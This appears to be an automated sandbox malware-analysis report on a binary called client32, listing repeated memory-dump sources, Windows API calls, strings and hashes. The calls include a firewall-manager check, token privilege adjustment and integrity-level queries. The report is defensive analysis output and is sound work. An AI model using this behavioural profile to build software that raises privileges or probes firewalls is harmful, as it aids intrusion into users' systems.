                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                    • String ID: Norwegian-Nynorsk
                                                                                                                                                                                                    • API String ID: 3475089800-461349085
                                                                                                                                                                                                    • Opcode ID: 2e58f17488358e80f7fe220b91d02648b230705b5a53270d03aa08bb5cd5880e
                                                                                                                                                                                                    • Instruction ID: a40d110deca82e0359611976522471010d48599839117bc449c0d8eb289fe403
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e58f17488358e80f7fe220b91d02648b230705b5a53270d03aa08bb5cd5880e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A151D4B9A00317ABFB115F31CD84B65FBA8AF02748F118161ED449B3C0E7B0D890C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                                                                    • API String ID: 3222248624-258972079
                                                                                                                                                                                                    • Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                                                                                    • API String ID: 3192549508-611217420
                                                                                                                                                                                                    • Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,75C1F550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,005FF708,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                    • EqualSid.ADVAPI32(?,005FF708,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1878589025-0
                                                                                                                                                                                                    • Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                                                                                    • Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2349140579-0
                                                                                                                                                                                                    • Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                                                                                    • Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170253
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170294
                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 11170337
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                    • Opcode ID: b3d6563a03eba15c24ddbac167ee768c0fba98bdc851e17b537fc91382271a28
                                                                                                                                                                                                    • Instruction ID: 27db78cdadf74c249b5c8ba9edd6ad64d50a2a80e21c069dafd2af58b2708385
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3d6563a03eba15c24ddbac167ee768c0fba98bdc851e17b537fc91382271a28
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3151837A904B039FE721CF65CD81A6BF7E9AF05358B20882EE495C2690EB75F584CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                    • Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                                                                                    • Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnumSystemLocalesA.KERNEL32(11170208,00000001,111705DD,00000001,00000000,00000000), ref: 111704E0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                    • Opcode ID: 129d2d17a05abfcc03aa176b6a9e6cde425405e1b3fabe192a562070e6df28d4
                                                                                                                                                                                                    • Instruction ID: 2f4ca2e02cbe28bb9c19aec6a05583bc0426c1b03cc76bb2c162af69d9cf893f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 129d2d17a05abfcc03aa176b6a9e6cde425405e1b3fabe192a562070e6df28d4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 16F067395A0B068BE721CF39C64CB56FBE0EB06718F108E2DD5E7D2690D7B9E044CA40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateEventMetricsSystem
